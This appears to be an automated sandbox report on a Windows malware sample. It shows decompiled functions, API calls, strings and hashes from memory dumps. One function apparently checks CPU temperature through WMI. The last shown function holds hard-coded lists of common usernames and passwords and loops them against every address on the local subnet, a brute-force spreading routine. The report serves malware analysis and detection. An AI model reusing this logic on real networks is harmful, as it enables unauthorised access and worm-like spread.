0x00000000
0x100112d8
0x1001125e
0x1001127a
0x1001127a
0x1001127e
0x100112b9
0x00000000
0x100112b9
0x10011280
0x10011282
0x00000000
0x00000000
0x00000000
0x10011284
0x10011270
0x10011276
0x10011278
0x10011298
0x00000000
0x10011298
0x00000000
0x10011278
0x10011286
0x00000000
0x10011286
0x00000000
0x1001119e
0x100111bd
0x100111c4
0x00000000
0x00000000
0x100111c6
0x100111cd
0x10011146
0x1001114c
0x10011161
0x1001116f
0x10011174
0x00000000
0x10011174
0x100111d3
0x100111da
0x00000000
0x00000000
0x00000000
0x100111da
0x1001113f
0x1001113f
0x1001113f
0x00000000
0x1001113f
0x10011106
0x00000000
0x10011106
0x100110c8
0x100110cb
0x00000000
0x00000000
0x100110d1
0x100110d4
0x100110d6
0x100110d8
0x100110e8
0x100110e8
0x100110e9
0x100110f5
0x100110f5
0x00000000
0x100110fb
0x100110da
0x100110dc
0x00000000
0x00000000
0x100110de
0x100110e0
0x100110ed
0x100110ed
0x100110ed
0x100110f3
0x100110f4
0x00000000
0x100110f4
0x100110e2
0x100110e6
0x00000000
0x00000000
0x00000000
0x100110e6
0x100110a9
0x100110a0
0x00000000
0x100110a0
0x1001109b
0x00000000
0x1001109b
0x00000000
0x00000000
0x00000000

Strings

\, xrefs: 100111BD
%s%s%s, xrefs: 1001115B
%s%s, xrefs: 100111EE
:, xrefs: 100111D3

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID: %s%s$%s%s%s$:$\
API String ID: 0-1100577047
Opcode ID: f037e63fdf72ae58e2d7bd101b11b83fd869d1fa30d0e05fc33ed9397080ebcf
Instruction ID: 7d1d8aea55d2c7b4e9d5ba96378724be36330254f6233abde42da96044c18d72
Opcode Fuzzy Hash: f037e63fdf72ae58e2d7bd101b11b83fd869d1fa30d0e05fc33ed9397080ebcf
Instruction Fuzzy Hash: FCA10531A04248ABEB26CF64CC81BDE77E9EF08390F20455AF9D59E191D7B1EAD1CB10

Uniqueness

Uniqueness Score: -1.00%

Function 10001F71, Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 176
comCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E10001F71() {
				void* _t61;
				void* _t63;
				void* _t64;
				void* _t66;
				void* _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				void* _t72;
				void* _t73;
				void* _t79;
				intOrPtr* _t82;
				intOrPtr* _t84;
				intOrPtr* _t89;
				intOrPtr* _t92;
				void* _t94;
				signed int _t96;
				void* _t120;
				signed int _t126;
				void* _t127;
				void* _t130;

				_t61 = E100158AC(E1001A10C, _t130);
				 *(_t130 - 0x1c) =  *(_t130 - 0x1c) | 0xffffffff;
				__imp__CoInitializeEx(0, 0, _t120, _t127, _t94);
				if(_t61 < 0) {
					L17:
					 *[fs:0x0] =  *((intOrPtr*)(_t130 - 0xc));
					return  *(_t130 - 0x1c);
				}
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				if(_t61 < 0) {
					L16:
					__imp__CoUninitialize();
					goto L17;
				}
				_t63 = _t130 - 0x14;
				 *((intOrPtr*)(_t130 - 0x14)) = 0;
				_t96 = 1;
				__imp__CoCreateInstance(0x1001fed8, 0, _t96, 0x1001fe08, _t63);
				if(_t63 < 0) {
					goto L16;
				}
				 *((intOrPtr*)(_t130 - 0x10)) = 0;
				_t64 = E10003AF3(_t130 - 0x28);
				 *(_t130 - 4) = 0;
				_t66 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t130 - 0x14)))) + 0xc))( *((intOrPtr*)(_t130 - 0x14)), E10003B4C(_t64), 0, 0, 0, 0, 0, 0, _t130 - 0x10, L"ROOT\\WMI");
				 *(_t130 - 4) =  *(_t130 - 4) | 0xffffffff;
				_t67 = E10003B47(_t130 - 0x28);
				if(_t66 < 0) {
					L14:
					_t68 =  *((intOrPtr*)(_t130 - 0x14));
					L15:
					 *((intOrPtr*)( *_t68 + 8))(_t68);
					goto L16;
				}
				__imp__CoSetProxyBlanket( *((intOrPtr*)(_t130 - 0x10)), 0xa, 0, 0, 3, 3, 0, 0);
				if(_t67 < 0) {
					L13:
					_t70 =  *((intOrPtr*)(_t130 - 0x10));
					 *((intOrPtr*)( *_t70 + 8))(_t70);
					goto L14;
				}
				 *((intOrPtr*)(_t130 - 0x18)) = 0;
				_t72 = E10003A9F(_t130 - 0x30);
				 *(_t130 - 4) = _t96;
				_t73 = E10003A9F(_t130 - 0x2c);
				 *(_t130 - 4) = 2;
				 *((intOrPtr*)(_t130 - 0x28)) =  *((intOrPtr*)( *((intOrPtr*)(_t130 - 0x10))));
				_t79 =  *((intOrPtr*)( *((intOrPtr*)(_t130 - 0x28)) + 0x50))( *((intOrPtr*)(_t130 - 0x10)), E10003B4C(_t73), E10003B4C(_t72), 0x30, 0, _t130 - 0x18, "WQL", "SELECT * FROM MSAcpi_ThermalZoneTemperature");
				E10003B47(_t130 - 0x2c);
				 *(_t130 - 4) =  *(_t130 - 4) | 0xffffffff;
				E10003B47(_t130 - 0x30);
				if(_t79 < 0) {
					goto L13;
				}
				 *((intOrPtr*)(_t130 - 0x20)) = 0;
				 *((intOrPtr*)(_t130 - 0x24)) = 0;
				while( *((intOrPtr*)(_t130 - 0x18)) != 0) {
					_t126 = 1;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t130 - 0x18)))) + 0x10))( *((intOrPtr*)(_t130 - 0x18)), 0xffffffff, _t126, _t130 - 0x20, _t130 - 0x24);
					if( *((intOrPtr*)(_t130 - 0x24)) == 0) {
						if( *(_t130 - 0x1c) == 0xffffffff) {
							 *(_t130 - 0x1c) = _t126;
						}
						break;
					}
					_t89 =  *((intOrPtr*)(_t130 - 0x20));
					 *((intOrPtr*)( *_t89 + 0x10))(_t89, L"CurrentTemperature", 0, _t130 - 0x40, 0, 0);
					 *(_t130 - 0x1c) = 0;
					__imp__#9(_t130 - 0x40);
					_t92 =  *((intOrPtr*)(_t130 - 0x20));
					 *((intOrPtr*)( *_t92 + 8))(_t92);
				}
				_t82 =  *((intOrPtr*)(_t130 - 0x10));
				 *((intOrPtr*)( *_t82 + 8))(_t82);
				_t84 =  *((intOrPtr*)(_t130 - 0x14));
				 *((intOrPtr*)( *_t84 + 8))(_t84);
				_t68 =  *((intOrPtr*)(_t130 - 0x18));
				goto L15;
			}

0x10001f76
0x10001f7e
0x10001f89
0x10001f91
0x1000212d
0x10002136
0x1000213e
0x1000213e
0x10001fa2
0x10001faa
0x10002127
0x10002127
0x00000000
0x10002127
0x10001fb0
0x10001fb3
0x10001fbe
0x10001fc6
0x10001fce
0x00000000
0x00000000
0x10001fdc
0x10001fdf
0x10001fe7
0x10002001
0x10002004
0x1000200d
0x10002014
0x1000211e
0x1000211e
0x10002121
0x10002124
0x00000000
0x10002124
0x10002027
0x1000202f
0x10002115
0x10002115
0x1000211b
0x00000000
0x1000211b
0x1000203d
0x10002040
0x1000204f
0x10002052
0x1000205e
0x1000206b
0x10002082
0x1000208a
0x1000208f
0x10002096
0x1000209d
0x00000000
0x00000000
0x1000209f
0x100020a2
0x100020a5
0x100020b9
0x100020c0
0x100020c6
0x100020f9
0x100020fb
0x100020fb
0x00000000
0x100020f9
0x100020c8
0x100020da
0x100020e0
0x100020e4
0x100020ea
0x100020f0
0x100020f0
0x100020fe
0x10002104
0x10002107
0x1000210d
0x10002110
0x00000000

APIs

__EH_prolog.LIBCMT ref: 10001F76
CoInitializeEx.OLE32(00000000,00000000,?,00000000,Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij), ref: 10001F89
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij), ref: 10001FA2
CoCreateInstance.OLE32(1001FED8,00000000,00000001,1001FE08,?,?,00000000,Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij), ref: 10001FC6

Part of subcall function 10003AF3: __EH_prolog.LIBCMT ref: 10003AF8
Part of subcall function 10003AF3: #823.MFC42(0000000C,00000000,?,10001FE4,ROOT\WMI,?,00000000,Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij), ref: 10003B03

CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij), ref: 10002027

Part of subcall function 10003A9F: __EH_prolog.LIBCMT ref: 10003AA4
Part of subcall function 10003A9F: #823.MFC42(0000000C,00000000,?,10002045,SELECT * FROM MSAcpi_ThermalZoneTemperature,?,00000000,Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij), ref: 10003AAF

VariantClear.OLEAUT32(?), ref: 100020E4
CoUninitialize.OLE32(?,00000000,Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij), ref: 10002127

Strings

SELECT * FROM MSAcpi_ThermalZoneTemperature, xrefs: 10002035
WQL, xrefs: 10002047
ROOT\WMI, xrefs: 10001FD4
CurrentTemperature, xrefs: 100020D4
Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij, xrefs: 10001F82

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: H_prolog$#823Initialize$BlanketClearCreateInstanceProxySecurityUninitializeVariant
String ID: CurrentTemperature$ROOT\WMI$SELECT * FROM MSAcpi_ThermalZoneTemperature$Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij$WQL
API String ID: 3344691479-126774125
Opcode ID: 2b146add790d6aaee150d1361063cfec507a33e50a778c54f3db5f33f550ffde
Instruction ID: 5fda2c5f1fd6f405cb694547c653a386dbb0f1928c65bf30cba0ecee5d6ee101
Opcode Fuzzy Hash: 2b146add790d6aaee150d1361063cfec507a33e50a778c54f3db5f33f550ffde
Instruction Fuzzy Hash: 6F514A70A01229AFDB15CB94CC89DEFBBB9FF497A0F104119F525A7295CB309A41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10001922, Relevance: 19.7, APIs: 13, Instructions: 181
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E10001922(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __fp0) {
				void* _t57;
				void _t62;
				void _t73;
				void* _t81;
				void* _t82;
				void* _t85;
				void _t89;
				void* _t132;
				void* _t134;
				intOrPtr _t135;
				void* _t137;

				_t140 = __fp0;
				E100158AC(E1001A0E8, _t132);
				_t135 = _t134 - 0x20;
				_t123 = __ecx;
				_t89 = 0;
				 *((intOrPtr*)(_t132 - 0x10)) = _t135;
				 *((intOrPtr*)(_t132 - 0x2c)) = __ecx;
				 *(_t132 - 0x14) = 0;
				 *(_t132 - 0x18) = 0;
				 *((intOrPtr*)(_t132 - 4)) = 0;
				if( *(_t132 + 0xc) != 3) {
					L4:
					E10001030(_t123 + 4, __eflags, _t140,  *(_t132 + 8),  *(_t132 + 0xc));
					while(1) {
						_t127 = _t123 + 4;
						_t57 = E1000112E(_t123 + 4);
						__eflags = _t57 - 0xf;
						if(_t57 <= 0xf) {
							goto L3;
						}
						memcpy(_t132 + 0xc, E100012B3(_t127, _t89), 3);
						_push(3);
						_push(_t132 + 0xc);
						_t62 = _t123 + 0x50;
						_push(_t62);
						L1001592C();
						_t137 = _t135 + 0x18;
						__eflags = _t62;
						if(_t62 != 0) {
							_push(0x100201f0);
							_push(_t132 - 0x24);
							 *(_t132 - 0x24) = "bad buffer";
							L10015932();
						}
						 *(_t132 + 8) = _t89;
						_t57 = memcpy(_t132 + 8, E100012B3(_t127, 3), 4);
						_t135 = _t137 + 0xc;
						__eflags =  *(_t132 + 8) - _t89;
						if( *(_t132 + 8) == _t89) {
							goto L3;
						} else {
							_t57 = E1000112E(_t127);
							__eflags = _t57 -  *(_t132 + 8);
							if(_t57 <  *(_t132 + 8)) {
								goto L3;
							} else {
								 *(_t132 - 0x1c) = _t89;
								E100010B6(_t89, _t127, _t140, _t132 + 0xc, 3);
								E100010B6(_t89, _t127, _t140, _t132 + 8, 4);
								E100010B6(_t89, _t127, _t140, _t132 - 0x1c, 4);
								 *(_t132 - 0x20) = _t89;
								E100010B6(_t89, _t127, _t140, _t132 - 0x20, 4);
								_t73 =  *(_t132 + 8);
								_t91 = _t73 - 0xf;
								_push(_t73 - 0xf);
								L10015806();
								 *(_t132 - 0x14) = _t73;
								_push( *(_t132 - 0x1c));
								L10015806();
								__eflags =  *(_t132 - 0x14);
								 *(_t132 - 0x18) = _t73;
								if( *(_t132 - 0x14) == 0) {
									L15:
									_push(0x100201f0);
									_push(_t132 - 0x28);
									 *(_t132 - 0x28) = "bad Allocate";
									L10015932();
									__eflags =  *(_t132 - 0x14);
									if( *(_t132 - 0x14) != 0) {
										_push( *(_t132 - 0x14));
										L10015800();
									}
									__eflags =  *(_t132 - 0x18);
									if( *(_t132 - 0x18) != 0) {
										_push( *(_t132 - 0x18));
										L10015800();
									}
									E1000128D( *((intOrPtr*)(_t132 - 0x2c)) + 4);
									E10001B85( *((intOrPtr*)(_t132 - 0x2c)), __eflags, _t140, 0, 0);
									return 0x10001980;
								} else {
									__eflags = _t73;
									if(_t73 == 0) {
										goto L15;
									} else {
										E100010B6(_t91, _t127, _t140,  *(_t132 - 0x14), _t91);
										__eflags =  *(_t132 - 0x20) - 0x12b7a5;
										if( *(_t132 - 0x20) == 0x12b7a5) {
											_t130 = _t123 + 0x14;
											E1000128D(_t123 + 0x14);
											E10001030(_t123 + 0x14, __eflags, _t140,  *(_t132 - 0x14), _t91);
											_t81 = E1000112E(_t123 + 0x14);
											_t82 = E100012B3(_t130, 0);
											 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x54)))) + 4))(_t82, _t81);
										}
										_push( *(_t132 - 0x14));
										L10015800();
										_push( *(_t132 - 0x18));
										L10015800();
										_t89 = 0;
										continue;
									}
								}
							}
						}
						goto L20;
					}
					goto L3;
				} else {
					_t85 = __ecx + 0x50;
					_push(3);
					_push(_t85);
					_push( *(_t132 + 8));
					L1001592C();
					_t135 = _t135 + 0xc;
					_t139 = _t85;
					if(_t85 != 0) {
						goto L4;
					} else {
						 *(_t132 + 0xc) = E1000112E(__ecx + 0x34);
						_t57 = E10001B85(__ecx, _t139, __fp0, E100012B3(__ecx + 0x34, 0),  *(_t132 + 0xc));
						L3:
						 *[fs:0x0] =  *((intOrPtr*)(_t132 - 0xc));
						return _t57;
					}
				}
				L20:
			}

0x10001922
0x10001927
0x1000192c
0x10001932
0x10001934
0x1000193a
0x1000193d
0x10001940
0x10001943
0x10001946
0x10001949
0x10001991
0x1000199a
0x1000199f
0x1000199f
0x100019a4
0x100019a9
0x100019ac
0x00000000
0x00000000
0x100019bd
0x100019c5
0x100019c7
0x100019c8
0x100019cb
0x100019cc
0x100019d1
0x100019d4
0x100019d6
0x100019db
0x100019e0
0x100019e1
0x100019e8
0x100019e8
0x100019f1
0x10001a00
0x10001a05
0x10001a08
0x10001a0b
0x00000000
0x10001a11
0x10001a13
0x10001a18
0x10001a1b
0x00000000
0x10001a21
0x10001a29
0x10001a2c
0x10001a39
0x10001a46
0x10001a53
0x10001a56
0x10001a5b
0x10001a5e
0x10001a61
0x10001a62
0x10001a68
0x10001a6b
0x10001a6e
0x10001a73
0x10001a78
0x10001a7b
0x10001adf
0x10001ae2
0x10001ae7
0x10001ae8
0x10001aef
0x10001af6
0x10001af9
0x10001afb
0x10001afe
0x10001b03
0x10001b04
0x10001b07
0x10001b09
0x10001b0c
0x10001b11
0x10001b18
0x10001b21
0x10001b2b
0x10001a7d
0x10001a7d
0x10001a7f
0x00000000
0x10001a81
0x10001a87
0x10001a8c
0x10001a93
0x10001a95
0x10001a9a
0x10001aa5
0x10001aac
0x10001ab7
0x10001ac3
0x10001ac3
0x10001ac6
0x10001ac9
0x10001acf
0x10001ad2
0x10001ad8
0x00000000
0x10001ad8
0x10001a7f
0x10001a7b
0x10001a1b
0x00000000
0x10001a0b
0x00000000
0x1000194b
0x1000194b
0x1000194e
0x10001950
0x10001951
0x10001954
0x10001959
0x1000195c
0x1000195e
0x00000000
0x10001960
0x1000196d
0x1000197b
0x10001980
0x10001985
0x1000198e
0x1000198e
0x1000195e
0x00000000

APIs

__EH_prolog.LIBCMT ref: 10001927
memcmp.MSVCRT ref: 10001954
memcpy.MSVCRT ref: 100019BD
memcmp.MSVCRT ref: 100019CC
_CxxThrowException.MSVCRT(?,100201F0), ref: 100019E8
memcpy.MSVCRT ref: 10001A00
#823.MFC42(?,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?,00000003,00000000), ref: 10001A62
#823.MFC42(?,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?,00000003,00000000), ref: 10001A6E
#825.MFC42(00000000,00000000,?,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?), ref: 10001AC9
#825.MFC42(?,00000000,?,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?), ref: 10001AD2
_CxxThrowException.MSVCRT(?,100201F0), ref: 10001AEF
#825.MFC42(00000000,?,100201F0,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?), ref: 10001AFE
#825.MFC42(?,?,100201F0,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?), ref: 10001B0C

Part of subcall function 10001B85: _ftol.MSVCRT ref: 10001BBB
Part of subcall function 10001B85: #823.MFC42(00000000,?,?,00000000), ref: 10001BC4
Part of subcall function 10001B85: #825.MFC42(00000000,?,?,?,00000000), ref: 10001BEC

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: #825$#823$ExceptionThrowmemcmpmemcpy$H_prolog_ftol
String ID:
API String ID: 547755216-0
Opcode ID: b4e42ea91160ab012cd013b64786ed1e328570740d5af7b3581fe3b7f09a972e
Instruction ID: 337cce6d98a7e5268623422442edda862c5d92c2f0d770eb3815ba39f102a424
Opcode Fuzzy Hash: b4e42ea91160ab012cd013b64786ed1e328570740d5af7b3581fe3b7f09a972e
Instruction Fuzzy Hash: 2F51E575A00109EBDF04DFA4C892AEEB7BDFF48380F50402AF505BA185DF75AA54CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00410816, Relevance: 19.7, APIs: 13, Instructions: 176
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00410816(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E00415985(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E0040EADE(_t121, E0040EA73(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E0040A3FC();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E0040EADE(_t121, E0040EA73(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t116 >= _v28.left) {
					if(_t123 + _t116 > _v28.right) {
						_t116 = _t108 - _v60.right + _v28.right;
					}
				} else {
					_t116 = _v28.left;
				}
				if(_t129 >= _v28.top) {
					if(_a4 + _t129 > _v28.bottom) {
						_t129 = _v60.top - _v60.bottom + _v28.bottom;
					}
				} else {
					_t129 = _v28.top;
				}
				return E00415C39(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

APIs

Part of subcall function 00415985: GetWindowLongA.USER32 ref: 00415990

GetParent.USER32(?), ref: 00410843
SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 00410866
GetWindowRect.USER32 ref: 00410880
GetWindowLongA.USER32 ref: 00410896
CopyRect.USER32 ref: 004108E3
CopyRect.USER32 ref: 004108ED
GetWindowRect.USER32 ref: 004108F6
CopyRect.USER32 ref: 00410912

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID:
API String ID: 808654186-0
Opcode ID: ee263a79baa54013d2b61d8ac3c6d9245b72c3f309f3bb1b80fd0c75ebe345cf
Instruction ID: a9eef657a1d3848816d1b54d3c08cca2d49c3a91070fde182695b067e2d910b9
Opcode Fuzzy Hash: ee263a79baa54013d2b61d8ac3c6d9245b72c3f309f3bb1b80fd0c75ebe345cf
Instruction Fuzzy Hash: A7516F72D00219ABDB00DFA9DC85EEEBBB9BF48314F154126F905F3291D774E9818B98

Uniqueness

Uniqueness Score: -1.00%

Function 10007AD8, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 168
networksleepCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E10007AD8(void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed char _v22;
				signed char _v23;
				void _v24;
				void _v28;
				int _v32;
				intOrPtr _v36;
				CHAR* _v40;
				CHAR* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				intOrPtr _v72;
				CHAR* _v76;
				CHAR* _v80;
				CHAR* _v84;
				intOrPtr _v88;
				CHAR* _v92;
				CHAR* _v96;
				CHAR* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				CHAR* _v112;
				char _v116;
				int _v120;
				intOrPtr _v124;
				CHAR* _v128;
				CHAR* _v132;
				CHAR* _v136;
				CHAR* _v140;
				CHAR* _v144;
				intOrPtr _v148;
				CHAR* _v152;
				CHAR* _v156;
				CHAR* _v160;
				CHAR* _v164;
				CHAR* _v168;
				CHAR* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				CHAR* _v188;
				CHAR* _v192;
				CHAR* _v196;
				CHAR* _v200;
				CHAR* _v204;
				CHAR* _v208;
				CHAR* _v212;
				CHAR* _v216;
				CHAR* _v220;
				CHAR* _v224;
				CHAR* _v228;
				char _v232;
				void _v359;
				char _v360;
				void _v487;
				char _v488;
				void* _t81;
				void* _t86;
				char* _t87;
				signed int _t109;
				signed int _t111;
				intOrPtr _t117;
				intOrPtr* _t120;
				intOrPtr _t123;
				intOrPtr* _t124;
				void* _t125;
				void* _t126;
				void* _t128;

				OutputDebugStringA(0x100246e8);
				_v116 = "administrator";
				_v112 = "test";
				_v108 = "admin";
				_v104 = "guest";
				_v100 = "alex";
				_v96 = "home";
				_v92 = "love";
				_v88 = "xp";
				_v84 = "user";
				_v80 = "game";
				_v76 = "123";
				_v72 = "nn";
				_v68 = "root";
				_v64 = 0x10024758;
				_v60 = 0x10024760;
				_v56 = 0x10024768;
				_v52 = 0x10024770;
				_v48 = 0x10024778;
				_v44 = "xpuser";
				_v40 = "hack";
				_v36 = "enter";
				_v32 = 0;
				_v232 = 0x10027114;
				_v228 = "password";
				_v224 = "111";
				_v220 = "123456";
				_v216 = "qwerty";
				_v212 = "test";
				_v208 = "abc123";
				_v204 = "memory";
				_v200 = "home";
				_v196 = "12345678";
				_v192 = "love";
				_v188 = "bbbbbb";
				_v184 = "xp";
				_v180 = "88888";
				_v176 = "nn";
				_v172 = "root";
				_v168 = "caonima";
				_v164 = "5201314";
				_v160 = "1314520";
				_v156 = "asdfgh";
				_v152 = "alex";
				_v148 = "angel";
				_v144 = "NULL";
				_v140 = "123";
				_v136 = "asdf";
				_v132 = "baby";
				_v128 = "woaini";
				_v124 = "movie";
				_v120 = 0;
				_t81 = E10007A9F();
				if(_t81 != 0) {
					_t109 = 0x1f;
					_v488 = 0;
					memset( &_v487, 0, _t109 << 2);
					_t126 = _t125 + 0xc;
					asm("stosw");
					asm("stosb");
					if(gethostname( &_v488, 0x80) != 0) {
						L16:
						__imp__#116();
						_t86 = 1;
						return _t86;
					}
					_t87 =  &_v488;
					__imp__#52(_t87);
					_t123 = _t87;
					_v12 = _t123;
					if(_t123 == 0) {
						goto L16;
					}
					_t117 = 0;
					_v8 = 0;
					while( *(_t117 +  *((intOrPtr*)(_t123 + 0xc))) != 0) {
						memset( &_v28, 0, 0x10);
						memcpy( &_v24,  *(_t117 +  *((intOrPtr*)(_t123 + 0xc))),  *(_t123 + 0xa));
						_v360 = 0;
						 *0x10026990 = 1;
						_t111 = 0x1f;
						memset( &_v359, 0, _t111 << 2);
						_t128 = _t126 + 0x24;
						asm("stosw");
						asm("stosb");
						do {
							 *0x1002700c = 0;
							memset( &_v360, 0, 0x80);
							wsprintfA( &_v360, "%d.%d.%d.%d", _v24 & 0x000000ff, _v23 & 0x000000ff, _v22 & 0x000000ff,  *0x10026990);
							_t128 = _t128 + 0x24;
							if("administrator" == 0) {
								goto L14;
							}
							_t120 =  &_v116;
							do {
								if(0x10027114 == 0) {
									goto L13;
								}
								_t124 =  &_v232;
								while(1) {
									Sleep(0xc8);
									if( *0x1002700c == 1) {
										break;
									}
									E10007E0B( &_v360,  *_t120,  *_t124);
									_t124 = _t124 + 4;
									_t128 = _t128 + 0xc;
									if( *_t124 != 0) {
										continue;
									}
									break;
								}
								_t123 = _v12;
								L13:
								_t120 = _t120 + 4;
							} while ( *_t120 != 0);
							L14:
							 *0x10026990 =  *0x10026990 + 1;
						} while ( *0x10026990 < 0xfe);
						_v8 = _v8 + 4;
						_t117 = _v8;
					}
					goto L16;
				}
				return _t81;
			}

0x10007ae7
0x10007aef
0x10007af6
0x10007afd
0x10007b04
0x10007b0b
0x10007b12
0x10007b19
0x10007b20
0x10007b27
0x10007b2e
0x10007b35
0x10007b3c
0x10007b43
0x10007b4a
0x10007b51
0x10007b58
0x10007b5f
0x10007b66
0x10007b6d
0x10007b74
0x10007b7b
0x10007b82
0x10007b85
0x10007b8f
0x10007b99
0x10007ba3
0x10007bad
0x10007bb7
0x10007bc1
0x10007bcb
0x10007bd5
0x10007bdf
0x10007be9
0x10007bf3
0x10007bfd
0x10007c07
0x10007c11
0x10007c1b
0x10007c25
0x10007c2f
0x10007c39
0x10007c43
0x10007c4d
0x10007c57
0x10007c61
0x10007c6b
0x10007c75
0x10007c7f
0x10007c86
0x10007c8d
0x10007c94
0x10007c97
0x10007c9e
0x10007caa
0x10007cb1
0x10007cbc
0x10007cbc
0x10007cbe
0x10007cc0
0x10007cd0
0x10007dfb
0x10007dfb
0x10007e03
0x00000000
0x10007e05
0x10007cd6
0x10007cdd
0x10007ce3
0x10007ce7
